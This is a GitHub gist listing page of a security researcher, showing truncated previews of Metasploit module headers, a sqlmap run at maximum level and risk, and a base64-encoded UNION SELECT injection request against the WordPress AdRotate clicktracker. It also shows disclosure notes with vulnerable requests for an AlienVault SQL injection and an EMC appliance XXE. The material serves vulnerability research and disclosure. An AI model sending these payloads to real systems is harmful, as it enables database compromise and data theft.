Skip to content

Instantly share code, notes, and snippets.

☠️
thought bleeding

Brandon Perry brandonprry

☠️
thought bleeding
Block or report user

Report or block brandonprry

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@brandonprry
brandonprry / gist:8947140
Last active Aug 29, 2015
Tested against 4.2.2.007 340vx
View gist:8947140
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'digest/md5'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
View gist:9199424
bperry@w00den-pickle:~/tools/sqlmap$ rm -rf output/
bperry@w00den-pickle:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 --technique=u --tamper=base64encode
sqlmap/1.0-dev-58eac36 - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:18:53
View gist:9198941
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gQUxMIFNFTEVDVCAzLDEsMSwxLS0= HTTP/1.1
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11
Host: 192.168.1.63
--------
View gist:9200346
HTTP request [#1]:
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-58eac36 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.63
Pragma: no-cache
Cache-control: no-cache,no-store
View gist:9330240
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
View lifesize_admin_ping.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
View gist:9814819
%define debug_package %{nil}
Name: mono
Version: 3.2.6
Release: 1%{?dist}
Summary: ZOS Mono
License: MIT
URL: http://www.google.com
Source0: mono.tar.gz
@brandonprry
brandonprry / gist:9874177
Last active Aug 29, 2015
AlienVault 4.5.0 authenticated sql injection
View gist:9874177
The following request is vulnerable to a SQL injection attack from authenticated users.
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive
@brandonprry
brandonprry / gist:9895721
Last active Aug 29, 2015
EMC CTA unauthed XXE with root perms
View gist:9895721
EMC Cloud Tiering Appliance v10.0 Unauthed XXE
The following authentication request is susceptible to an XXE attack:
POST /api/login HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
View gist:9921280
The following request is vulnerable to a SQL injection attack from authenticated users.
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive
You can’t perform that action at this time.